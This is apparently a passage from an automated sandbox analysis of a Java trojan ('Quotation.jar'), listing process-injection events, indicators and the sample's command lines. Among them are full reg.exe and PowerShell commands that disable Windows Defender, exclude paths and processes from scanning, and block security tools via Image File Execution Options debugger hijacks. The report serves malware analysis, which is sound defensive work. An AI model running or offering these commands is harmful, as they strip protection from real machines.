PID 3696 wrote to memory of 1152	3696	cmd.exe	180
PID 3696 wrote to memory of 1152	3696	cmd.exe	180
PID 3588 wrote to memory of 3992	3588	java.exe	181
PID 3588 wrote to memory of 3992	3588	java.exe	181
PID 3992 wrote to memory of 3312	3992	cmd.exe	183
PID 3992 wrote to memory of 3312	3992	cmd.exe	183
PID 3992 wrote to memory of 3636	3992	cmd.exe	184
PID 3992 wrote to memory of 3636	3992	cmd.exe	184
PID 3588 wrote to memory of 3708	3588	java.exe	185
PID 3588 wrote to memory of 3708	3588	java.exe	185
PID 3708 wrote to memory of 1916	3708	cmd.exe	187
PID 3708 wrote to memory of 1916	3708	cmd.exe	187
PID 3588 wrote to memory of 1812	3588	java.exe	188
PID 3588 wrote to memory of 1812	3588	java.exe	188
PID 3708 wrote to memory of 3416	3708	cmd.exe	190
PID 3708 wrote to memory of 3416	3708	cmd.exe	190
PID 3588 wrote to memory of 1864	3588	java.exe	191
PID 3588 wrote to memory of 1864	3588	java.exe	191
PID 1864 wrote to memory of 408	1864	cmd.exe	193
PID 1864 wrote to memory of 408	1864	cmd.exe	193
PID 1864 wrote to memory of 2728	1864	cmd.exe	194
PID 1864 wrote to memory of 2728	1864	cmd.exe	194
PID 3588 wrote to memory of 404	3588	java.exe	195
PID 3588 wrote to memory of 404	3588	java.exe	195
PID 404 wrote to memory of 3756	404	cmd.exe	197
PID 404 wrote to memory of 3756	404	cmd.exe	197
PID 404 wrote to memory of 2188	404	cmd.exe	198
PID 404 wrote to memory of 2188	404	cmd.exe	198
PID 3588 wrote to memory of 1148	3588	java.exe	199
PID 3588 wrote to memory of 1148	3588	java.exe	199
PID 1148 wrote to memory of 3864	1148	cmd.exe	201
PID 1148 wrote to memory of 3864	1148	cmd.exe	201
PID 1148 wrote to memory of 2260	1148	cmd.exe	202
PID 1148 wrote to memory of 2260	1148	cmd.exe	202
PID 3588 wrote to memory of 640	3588	java.exe	203
PID 3588 wrote to memory of 640	3588	java.exe	203
PID 640 wrote to memory of 408	640	cmd.exe	205
PID 640 wrote to memory of 408	640	cmd.exe	205
PID 640 wrote to memory of 644	640	cmd.exe	206
PID 640 wrote to memory of 644	640	cmd.exe	206
PID 3588 wrote to memory of 3644	3588	java.exe	207
PID 3588 wrote to memory of 3644	3588	java.exe	207
PID 3644 wrote to memory of 580	3644	cmd.exe	209
PID 3644 wrote to memory of 580	3644	cmd.exe	209
PID 3644 wrote to memory of 2956	3644	cmd.exe	210
PID 3644 wrote to memory of 2956	3644	cmd.exe	210
PID 3588 wrote to memory of 3972	3588	java.exe	211
PID 3588 wrote to memory of 3972	3588	java.exe	211
PID 3972 wrote to memory of 3528	3972	cmd.exe	213
PID 3972 wrote to memory of 3528	3972	cmd.exe	213
PID 3972 wrote to memory of 3184	3972	cmd.exe	214
PID 3972 wrote to memory of 3184	3972	cmd.exe	214
PID 3588 wrote to memory of 408	3588	java.exe	215
PID 3588 wrote to memory of 408	3588	java.exe	215
PID 408 wrote to memory of 3012	408	cmd.exe	217
PID 408 wrote to memory of 3012	408	cmd.exe	217
PID 3588 wrote to memory of 580	3588	java.exe	218
PID 3588 wrote to memory of 580	3588	java.exe	218
PID 408 wrote to memory of 3528	408	cmd.exe	220
PID 408 wrote to memory of 3528	408	cmd.exe	220
PID 3588 wrote to memory of 2156	3588	java.exe	221
PID 3588 wrote to memory of 2156	3588	java.exe	221
PID 2156 wrote to memory of 2188	2156	cmd.exe	223
PID 2156 wrote to memory of 2188	2156	cmd.exe	223
PID 2156 wrote to memory of 4108	2156	cmd.exe	224
PID 2156 wrote to memory of 4108	2156	cmd.exe	224
PID 3588 wrote to memory of 4128	3588	java.exe	225
PID 3588 wrote to memory of 4128	3588	java.exe	225
PID 4128 wrote to memory of 4164	4128	cmd.exe	227
PID 4128 wrote to memory of 4164	4128	cmd.exe	227
PID 4128 wrote to memory of 4184	4128	cmd.exe	228
PID 4128 wrote to memory of 4184	4128	cmd.exe	228
PID 3588 wrote to memory of 4204	3588	java.exe	229
PID 3588 wrote to memory of 4204	3588	java.exe	229
PID 4204 wrote to memory of 4240	4204	cmd.exe	231
PID 4204 wrote to memory of 4240	4204	cmd.exe	231
PID 4204 wrote to memory of 4260	4204	cmd.exe	232
PID 4204 wrote to memory of 4260	4204	cmd.exe	232
PID 3588 wrote to memory of 4280	3588	java.exe	233
PID 3588 wrote to memory of 4280	3588	java.exe	233
PID 4280 wrote to memory of 4316	4280	cmd.exe	235
PID 4280 wrote to memory of 4316	4280	cmd.exe	235
PID 4280 wrote to memory of 4336	4280	cmd.exe	236
PID 4280 wrote to memory of 4336	4280	cmd.exe	236
PID 3588 wrote to memory of 4356	3588	java.exe	237
PID 3588 wrote to memory of 4356	3588	java.exe	237
PID 4356 wrote to memory of 4392	4356	cmd.exe	239
PID 4356 wrote to memory of 4392	4356	cmd.exe	239
PID 4356 wrote to memory of 4412	4356	cmd.exe	240
PID 4356 wrote to memory of 4412	4356	cmd.exe	240
PID 3588 wrote to memory of 4432	3588	java.exe	241
PID 3588 wrote to memory of 4432	3588	java.exe	241
PID 4432 wrote to memory of 4468	4432	cmd.exe	243
PID 4432 wrote to memory of 4468	4432	cmd.exe	243
PID 4432 wrote to memory of 4488	4432	cmd.exe	244
PID 4432 wrote to memory of 4488	4432	cmd.exe	244
PID 3588 wrote to memory of 4508	3588	java.exe	245
PID 3588 wrote to memory of 4508	3588	java.exe	245
PID 4508 wrote to memory of 4544	4508	cmd.exe	247
PID 4508 wrote to memory of 4544	4508	cmd.exe	247
PID 4508 wrote to memory of 4564	4508	cmd.exe	248
PID 4508 wrote to memory of 4564	4508	cmd.exe	248
PID 3588 wrote to memory of 4584	3588	java.exe	249
PID 3588 wrote to memory of 4584	3588	java.exe	249
PID 4584 wrote to memory of 4620	4584	cmd.exe	251
PID 4584 wrote to memory of 4620	4584	cmd.exe	251
PID 4584 wrote to memory of 4640	4584	cmd.exe	252
PID 4584 wrote to memory of 4640	4584	cmd.exe	252
PID 3588 wrote to memory of 4660	3588	java.exe	253
PID 3588 wrote to memory of 4660	3588	java.exe	253
PID 4660 wrote to memory of 4696	4660	cmd.exe	255
PID 4660 wrote to memory of 4696	4660	cmd.exe	255
PID 4660 wrote to memory of 4716	4660	cmd.exe	256
PID 4660 wrote to memory of 4716	4660	cmd.exe	256
PID 3588 wrote to memory of 4736	3588	java.exe	257
PID 3588 wrote to memory of 4736	3588	java.exe	257
PID 4736 wrote to memory of 4772	4736	cmd.exe	259
PID 4736 wrote to memory of 4772	4736	cmd.exe	259
PID 4736 wrote to memory of 4792	4736	cmd.exe	260
PID 4736 wrote to memory of 4792	4736	cmd.exe	260
PID 3588 wrote to memory of 4812	3588	java.exe	261
PID 3588 wrote to memory of 4812	3588	java.exe	261
PID 4812 wrote to memory of 4848	4812	cmd.exe	263
PID 4812 wrote to memory of 4848	4812	cmd.exe	263
PID 4812 wrote to memory of 4868	4812	cmd.exe	264
PID 4812 wrote to memory of 4868	4812	cmd.exe	264
PID 3588 wrote to memory of 4888	3588	java.exe	265
PID 3588 wrote to memory of 4888	3588	java.exe	265
PID 3588 wrote to memory of 4920	3588	java.exe	267
PID 3588 wrote to memory of 4920	3588	java.exe	267
PID 4888 wrote to memory of 4948	4888	cmd.exe	269
PID 4888 wrote to memory of 4948	4888	cmd.exe	269
PID 4888 wrote to memory of 5008	4888	cmd.exe	270
PID 4888 wrote to memory of 5008	4888	cmd.exe	270
PID 3588 wrote to memory of 5024	3588	java.exe	271
PID 3588 wrote to memory of 5024	3588	java.exe	271
PID 5024 wrote to memory of 5060	5024	cmd.exe	273
PID 5024 wrote to memory of 5060	5024	cmd.exe	273
PID 5024 wrote to memory of 5080	5024	cmd.exe	274
PID 5024 wrote to memory of 5080	5024	cmd.exe	274
PID 3588 wrote to memory of 5100	3588	java.exe	275
PID 3588 wrote to memory of 5100	3588	java.exe	275
PID 5100 wrote to memory of 4036	5100	cmd.exe	277
PID 5100 wrote to memory of 4036	5100	cmd.exe	277
PID 5100 wrote to memory of 3956	5100	cmd.exe	278
PID 5100 wrote to memory of 3956	5100	cmd.exe	278
PID 3588 wrote to memory of 4112	3588	java.exe	279
PID 3588 wrote to memory of 4112	3588	java.exe	279
PID 4112 wrote to memory of 4144	4112	cmd.exe	281
PID 4112 wrote to memory of 4144	4112	cmd.exe	281
PID 4112 wrote to memory of 4192	4112	cmd.exe	282
PID 4112 wrote to memory of 4192	4112	cmd.exe	282
PID 3588 wrote to memory of 4184	3588	java.exe	283
PID 3588 wrote to memory of 4184	3588	java.exe	283
PID 4184 wrote to memory of 4264	4184	cmd.exe	285
PID 4184 wrote to memory of 4264	4184	cmd.exe	285
PID 4184 wrote to memory of 4296	4184	cmd.exe	286
PID 4184 wrote to memory of 4296	4184	cmd.exe	286
PID 3588 wrote to memory of 4344	3588	java.exe	287
PID 3588 wrote to memory of 4344	3588	java.exe	287
PID 4344 wrote to memory of 4396	4344	cmd.exe	289
PID 4344 wrote to memory of 4396	4344	cmd.exe	289
PID 4344 wrote to memory of 4416	4344	cmd.exe	290
PID 4344 wrote to memory of 4416	4344	cmd.exe	290
PID 3588 wrote to memory of 4448	3588	java.exe	291
PID 3588 wrote to memory of 4448	3588	java.exe	291
PID 4448 wrote to memory of 4500	4448	cmd.exe	293
PID 4448 wrote to memory of 4500	4448	cmd.exe	293
PID 4448 wrote to memory of 4560	4448	cmd.exe	294
PID 4448 wrote to memory of 4560	4448	cmd.exe	294
PID 3588 wrote to memory of 4568	3588	java.exe	295
PID 3588 wrote to memory of 4568	3588	java.exe	295
PID 4568 wrote to memory of 4632	4568	cmd.exe	297
PID 4568 wrote to memory of 4632	4568	cmd.exe	297
PID 4568 wrote to memory of 4652	4568	cmd.exe	298
PID 4568 wrote to memory of 4652	4568	cmd.exe	298
PID 3588 wrote to memory of 4700	3588	java.exe	299
PID 3588 wrote to memory of 4700	3588	java.exe	299
PID 4700 wrote to memory of 4744	4700	cmd.exe	301
PID 4700 wrote to memory of 4744	4700	cmd.exe	301
PID 4700 wrote to memory of 4776	4700	cmd.exe	302
PID 4700 wrote to memory of 4776	4700	cmd.exe	302
PID 3588 wrote to memory of 4808	3588	java.exe	303
PID 3588 wrote to memory of 4808	3588	java.exe	303
PID 4808 wrote to memory of 4848	4808	cmd.exe	305
PID 4808 wrote to memory of 4848	4808	cmd.exe	305
PID 4808 wrote to memory of 4896	4808	cmd.exe	306
PID 4808 wrote to memory of 4896	4808	cmd.exe	306
PID 3588 wrote to memory of 4952	3588	java.exe	307
PID 3588 wrote to memory of 4952	3588	java.exe	307
PID 4952 wrote to memory of 5040	4952	cmd.exe	309
PID 4952 wrote to memory of 5040	4952	cmd.exe	309
PID 4952 wrote to memory of 4992	4952	cmd.exe	310
PID 4952 wrote to memory of 4992	4952	cmd.exe	310
PID 3588 wrote to memory of 4964	3588	java.exe	311
PID 3588 wrote to memory of 4964	3588	java.exe	311
PID 4964 wrote to memory of 5060	4964	cmd.exe	313
PID 4964 wrote to memory of 5060	4964	cmd.exe	313
PID 4964 wrote to memory of 5108	4964	cmd.exe	314
PID 4964 wrote to memory of 5108	4964	cmd.exe	314
PID 3588 wrote to memory of 3984	3588	java.exe	315
PID 3588 wrote to memory of 3984	3588	java.exe	315
PID 3984 wrote to memory of 4180	3984	cmd.exe	317
PID 3984 wrote to memory of 4180	3984	cmd.exe	317
PID 3984 wrote to memory of 4144	3984	cmd.exe	318
PID 3984 wrote to memory of 4144	3984	cmd.exe	318
PID 3588 wrote to memory of 4220	3588	java.exe	319
PID 3588 wrote to memory of 4220	3588	java.exe	319
PID 4220 wrote to memory of 4328	4220	cmd.exe	321
PID 4220 wrote to memory of 4328	4220	cmd.exe	321
PID 4220 wrote to memory of 4404	4220	cmd.exe	322
PID 4220 wrote to memory of 4404	4220	cmd.exe	322
PID 3588 wrote to memory of 4396	3588	java.exe	323
PID 3588 wrote to memory of 4396	3588	java.exe	323
PID 4396 wrote to memory of 4552	4396	cmd.exe	325
PID 4396 wrote to memory of 4552	4396	cmd.exe	325
PID 4396 wrote to memory of 4544	4396	cmd.exe	326
PID 4396 wrote to memory of 4544	4396	cmd.exe	326
PID 3588 wrote to memory of 4620	3588	java.exe	327
PID 3588 wrote to memory of 4620	3588	java.exe	327
PID 4620 wrote to memory of 4652	4620	cmd.exe	329
PID 4620 wrote to memory of 4652	4620	cmd.exe	329
PID 4620 wrote to memory of 4788	4620	cmd.exe	330
PID 4620 wrote to memory of 4788	4620	cmd.exe	330
PID 3588 wrote to memory of 4796	3588	java.exe	331
PID 3588 wrote to memory of 4796	3588	java.exe	331
PID 4796 wrote to memory of 4928	4796	cmd.exe	333
PID 4796 wrote to memory of 4928	4796	cmd.exe	333
PID 3588 wrote to memory of 4956	3588	java.exe	334
PID 3588 wrote to memory of 4956	3588	java.exe	334
PID 4796 wrote to memory of 4996	4796	cmd.exe	336
PID 4796 wrote to memory of 4996	4796	cmd.exe	336
PID 3588 wrote to memory of 2188	3588	java.exe	337
PID 3588 wrote to memory of 2188	3588	java.exe	337
PID 2188 wrote to memory of 4176	2188	cmd.exe	339
PID 2188 wrote to memory of 4176	2188	cmd.exe	339
PID 2188 wrote to memory of 4164	2188	cmd.exe	340
PID 2188 wrote to memory of 4164	2188	cmd.exe	340
PID 3588 wrote to memory of 4288	3588	java.exe	341
PID 3588 wrote to memory of 4288	3588	java.exe	341
PID 3588 wrote to memory of 4556	3588	java.exe	343
PID 3588 wrote to memory of 4556	3588	java.exe	343
PID 3588 wrote to memory of 4652	3588	java.exe	345
PID 3588 wrote to memory of 4652	3588	java.exe	345
PID 3588 wrote to memory of 4940	3588	java.exe	347
PID 3588 wrote to memory of 4940	3588	java.exe	347
PID 3588 wrote to memory of 4988	3588	java.exe	349
PID 3588 wrote to memory of 4988	3588	java.exe	349
PID 3588 wrote to memory of 4332	3588	java.exe	351
PID 3588 wrote to memory of 4332	3588	java.exe	351
PID 3588 wrote to memory of 4560	3588	java.exe	353
PID 3588 wrote to memory of 4560	3588	java.exe	353
PID 3588 wrote to memory of 4804	3588	java.exe	355
PID 3588 wrote to memory of 4804	3588	java.exe	355
PID 3588 wrote to memory of 688	3588	java.exe	357
PID 3588 wrote to memory of 688	3588	java.exe	357

Loads dropped DLL 1 IoCs

pid	Process
3588	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\osDbp\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\osDbp\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\osDbp\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\osDbp\Desktop.ini	java.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3588	java.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Quotation.jar
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Adds Run entry to start application
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
PID:3588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:408
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2060
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:576
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3708
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\osDbp\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:808
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\osDbp\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:904
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\osDbp
  2⤵
  - Views/modifies file attributes
  PID:396
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\osDbp
  2⤵
  - Views/modifies file attributes
  PID:1152
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\osDbp
  2⤵
  - Views/modifies file attributes
  PID:1396
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\osDbp\VNDAi.class
  2⤵
  - Views/modifies file attributes
  PID:1488
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3192
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:3412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\osDbp','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\osDbp\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3404
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3424
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3636
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3096
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2084
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3720
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1060
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3596
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2408
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3528
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2172
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1576
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1020
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3972
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:2408
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3264
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3864
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:424
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1468
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2068
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1008
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1212
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1916
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:3420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1152
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2060
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:3096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1164
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1916
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:508
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:3192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1152
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3992
